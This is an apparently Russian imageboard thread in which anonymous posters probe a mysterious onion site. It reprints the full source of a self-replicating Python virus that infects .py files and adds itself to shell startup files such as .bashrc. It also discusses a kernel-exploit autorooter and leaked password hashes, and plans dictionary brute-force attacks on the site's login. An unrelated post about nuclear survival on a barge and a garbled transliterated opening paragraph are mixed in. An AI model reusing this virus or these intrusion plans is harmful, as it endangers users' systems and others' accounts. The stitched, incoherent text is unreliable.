Rebetia nie stostiti vskrevaç etiu tiemu. Ve jestiu molod, śutiliv, vam vse lehkje. Jestiti nie tiek. Jestiti nie Çikatilo, i daje nieje sea arxive specslujbe. Seda luçśje nie lezç. Serçeznje, leboy iz vas jestitie jaleç. Luçśje zakroetie sea tiemu i zabuçte çto tiuti pisalosç. Ja vpolne postie çtiek dannem soobçenek vestietie oda dopolnitelne interes, no xoste srazje predostereç sea petlivex je stop. Sea ostaln prostje nie nastudte. Udaçe.
>>279146 Может это обычный troll,что-то делающий в onion, но фото то относительно не новые. + куча bin файлов да и тот же ...razum.pdf Кстати, кто нибудь PDF открыл?
import threading import random, time, sys, string, inspect, re import os, traceback
class Virii():
def infect(self, path): import os, string #print "Try to infect: %s" % path #if self.debug: # print "Processing: %s" % path nl = os.linesep letters = string.letters if os.path.getsize(path) > 10000000: return False # Skip large files try: f = open(path) file_content = f.read() f.seek(0) except: if self.debug: print traceback.format_exc() return False if "python-vx" in file_content: if self.debug: print "Already infected: %s" % path f.close() return False file_content = "" data = "" i = 0 infected = False #print f f.flush() old_line, old_line2 = "", "" for l in f: i += 1 if i>20 and not infected: if (l[0] in letters and "try" not in old_line2) and old_line[0] == " " or old_line[0] == "#": data = data + nl+self.myself+nl infected = True data = data + l old_line2 = old_line old_line = l f.close() if infected: try: f = open(path, "w+") f.write(data) f.close() if self.debug: print "%s Infected!" % path except: if self.debug: print traceback.format_exc() return False
def walk(self, path): import os for root, dirs, files in os.walk(path): for d in dirs: if not d[0]==".": full_dir = os.path.join(root, d) self.walk(full_dir) pass for f in files: path = os.path.join(root, f) if not f.endswith(".py"): pass #print "Skipp", path else: #print "Infect", path self.infect(path) def add_me(self, path): try: f = open(path, 'a') f.write(chr(10)+"python ~/tmp8.py & "+chr(10)) f.close() except: if self.debug: print "Can't write to %s file" % bashrc print traceback.format_exc()
def run(self): import threading, inspect, sys, os self.debug = False if self.debug: print "Threads:", threading.active_count() if threading.active_count()>2: if self.debug: print "Too many threads" return False self.myself = inspect.getsource(D)+os.linesep + inspect.getsource(a_a)+os.linesep+"a_a()" #print self.myself self.walk(".") if os.name == "posix" and self.debug == False: bashrc = "%s/.bashrc" % os.environ['HOME'] tmp = "%s/tmp8.py" % os.environ['HOME'] if os.path.exists(tmp) and not self.debug: pass else: try: f = open(tmp, 'w+') f.write(self.myself) f.close() except: if self.debug: print "Can't create tmp.py file" print traceback.format_exc() else: self.add_me(bashrc) self.add_me("%s/.xsession" % os.environ['HOME']) self.add_me("%s/.profile" % os.environ['HOME']) self.add_me("%s/.kshrc" % os.environ['HOME']) self.add_me("%s/.zshrc" % os.environ['HOME']) self.add_me("%s/.cshrc" % os.environ['HOME']) self.add_me("%s/.xinitrc" % os.environ['HOME']) t = Virii() t.run() def a_a(): try: import base64, sys, inspect, os code = base64.b64decode(D.source) d = compile(code, filename=" ", mode="exec") eval(d, globals(), locals()) except: pass
>>279492 Это вирус. Копирует свой код в другие файлы и прописывает себя в "автозагрузку" на POSIX-системах. Другой вредоносной деятельности при беглом осмотре кода не замечено.
>>279485 В директории http://ninoetevzx2irhgj.onion/files/research/l~1/determ/1/ находится авторутер. Файл 1.pl представляет собой скрипт автоматической сборки и запуска сплойтов для разных версий ядра Линукс (сами эксплойты - программы на Си в той же папке). Впрочем, судя по всему, эти вещи уже давно устарели.
Насколько я понял, это сайт какого-то кулхацкера.
В связи с этим могу предположить, что так называемые фотографии (возможно, не все) являются контейнерами для информации. Искажения на фотках - результат работы стеганографических алгоритмов.
>>279509 скрипт на перле тоже находил, имхо написан ужасно. Вызывать системные утилиты таким образом - дико. Можно было и на баше написать (красивее бы получилось). Сайт с которого качаться эксплоиты не работает. На хацкера он мало похож, слишком все у него не продумано, но как знать... Ждем когда кто-то и анонов напишет на жс или пыхе брут для того сайта, тогда наверно многое прояснится.
>>279510 Не думаю, что брутер - перспективная идея. Я тут нашел еще кое-что. В каталоге http://ninoetevzx2irhgj.onion/lab/1/ есть файл p.txt (и еще один файл с очень интригующим названием "The Magical and Ritual Use of Herbs.pdf"). Текстовик представляет собой склеенное содержимое двух разных файлов passwd из каких-то unix-like систем. Так вот, во второй половине файла аккаунты root и image содержат хеши паролей в открытом виде.
>>279516 На всякий случай забил этот хеш в гугл. И не зря. Файл p.txt является частью вот этой пасты: http://pastebin.com/raw.php?i=n1QVjqfs Кажется, это репорт про то, как хакнули imageshark. К нашему сайту этот хеш отношения не имеет.
Наверное я самый нуб тут, но всё-таки Кто нибудь пробовал открыть вот эту ссылку(скрытую): <!-- <a href="/s/all/~jake/public/foto/browse/year/1972/">public fotos</a> -->
>>279631 Доброй ночи! Я все таки еще подумаю над скриптом подбора пароля. Попробую запилить перебор по словарям. Как будет готово - вброшу. Но это, скорее всего, будет после обеда.
По поводу написания скрипта для подбора. У меня ничего другого в голову не пришло, как писать юзерскрипт для браузера который будет пихать пороли в форму (но тут трабла, жаваскрипт вроде не умеет читать инфу из сторонних файлов) А вообще еслибы не POST запросы, можно было бы про юрл перебрать....
Прошу прощения, вчера был немного нетрезв. >>279543 Я про те, где говорится про IRC. >>279609 В третьей лабе лежат такие фоточки. /Сам ни черта не проггер, увы, тут помочь не смогу. Но отныне я трезв и полов энтузиазма.
Я здесь в РО, мониторю тред. Пока проблемы с ТОРом, планирую потом просмотреть все что вы тут накопали. Если тред дойдет до БЛ или начнет тонуть, сохраните его пожалуйста, это все чертовски интересно. Когда будет свободное время, то возможно подключусь к поиску сам. Если честно, страшно немного -- открывать ссылки не зная, что за ними. Как вы в себе этот страх преодолеваете? Или у вас этого ощущения неизвестности нет?
>>279637 Снова вкатываюсь, но уже не с пустыми руками. Выпилил тут на коленке скриптец. Говорю сразу: работает медленно. Для работы нужен Linux, Tor и cURL. Найти словари труда не составит.
>>279792 Замутите пока новый тред (а лучше конфу), а я пока свалю по делам (через час буду). Если создадите новый тред - запостите ссылку сюда (а то хуй найду). Если что мой jabber: [email protected] >>279793 Ух батенька а вы извращенец, bash + tor) П.С конструкция с одинарными апострафами устарела, используй $()
>>279821 StandardML. Только вот с socks могут быть проблемы. Я все больше склоняюсь к варианту Си+libcurl. Правда, существенного прироста в скорости не ожидается, т.к. все упирается в Tor. А делать несколько потоков - чревато. Так не то, что сервер, а всю сеть можно заставить срать кирпичами, если несколько человек запустят прогу. Еще я читал, что в HTML5 теперь можно работать с внешними файлами. Т.е. можно запилить тупо браузерный скрипт на JS и скормить ему несколько словарей.
>>279829 Я его в последний раз ковырял еще когда в школе учился. Сейчас уже мало что помню. Но запилить попробую. Ведь тогда исчезнет зависимость от ОС и внешних библиотек.
Еще меня терзают смутные сомнения насчет этого сайта. Во-первых, он выглядит как домашняя страничка Амнезии. Есть вероятность, что это просто какой-то школьник так развлекается. Во-вторых, никто до сих пор не выяснил одной важной детали: где и как анон, который вбросил сюда адрес этого сайта, узнал про него. Ведь такой URL не нагуглишь и чисто случайно на него не попадешь. Возможно, тот анон и есть автор сайта и если мы вдруг вскроем пароль, то не исключено, что после этого увидим нечто вроде "АЗАЗА Я ВАС ЗАТРАЛЕЛ))))0)".
>>279835 >Ведь такой URL не нагуглишь и чисто случайно на него не попадешь.
Я его вбросил, нашел я его на двачах год назад - уже было небольшое обсуждение, но тогда мало что нашли.
А в том старом треде (2014 года) на сколько помню анон, который вбросил адрес писал что нашел его своим сканером тор-сети. Типа сканер, который находит все тор-адреса трафик на который проходит через его хост (или что-то в этом роде)
И кому верит неизвестно. Сегодня спрашивал у знакомого про этот сайт, он же сказал что сайт год назад ломали и слили все на хостинг. А юрл сайта легко гуглится.
>>279841 Так а что с теми числами, которые являют собой секундный отсчет? Придумали что? /Сорь за маленькую активность, обещаю повисеть тут с вами в скором времени. А еще Что насчет конфы? Где собираемся в итоге?
>>278176 Как-то в 2012 с карты jodi.org перешел на старый сайт-архив анимаций. Открыл рандомную. Там был нарисован вид на остров в море из окна самолета, а с неба сыпал снег под музыку last christmas. Одновременно с переходом по ссылке мне было предложено скачать небольшого размера mp3-файл под названием last christ, что я и сделал. Так вот, это был до неузнаваемости исковерканый last christmas. Начинался он как обычно, постепенно переходя в громкий пугающий гул с нечеловеческими криками. Было дело ночью, так что я пересрал и дрожащими руками удалил это нахуй. Теперь вот вспомнил снова, но сайт найти не могу. Мб, кто натыкался?
Последний раз заход делал в прошлом году также летом. Убил почти весь день на эту хуйню. Ебаный ты в рот, сука! 1) Вот такая вот хуйня. В архиве куча упорядоченных архивов и в итоге dll файлы. архив http://rghost.ru/6VRvTGMq2. Пароль на пике. Второй архив не качал - хотите качайте сами. 2) Какая-то шизофазия. 3) Какая-то шизофазия[2]. 4) Годнота для интересующихся что владеют английским.
Ай все я заебался в край. Хуйня это все полная. Самое стремное что я находил, так это выпиленный сайт какой-то секты, где еще музон был КОТОРЫЙ Я БЛЯТЬ СКАЧАЛ И ПРОЕБАЛ БЕССЛЕДНО СУКА! На черном фоне было красном что-то написано. Музон был что-то вроде дакр эмбиент/индастриал хуеты. Убил на всю хуйню часов 10. Нужен хотя бы фильтр для нерабочих сайтов, что ли. Но я не погромист так что придется сосать хуй.
>>141437 >141436 >Главная идея баржи, это возможность неплохо жить после ядерной войны. Если ядерный БП, то тебя вместе с земляночкой просто выжжет. А даже самая дебильная страна не будет бомбить ядерными боеголовками океан. >Алсо, ТО как раз и повод собирать группу людей. С группой всегда легче. Тем более я сказал, что можно причалить и после всего выйти и искать ресурсы на суше. Насчет ре своего производства - думаю баржа вывезет огород в 3/4 своей поверхности и водочиститель. >>141500
>>286762 насчёт двух архивов, это Аркбомбы, т.е. в архивах заархивировано дохуя-дохуя одинаковой информации, используют эти архивы для дисфункции операционной системы при распаковке эдакой матрёшки
Прон и ссыль на /b/ лесом.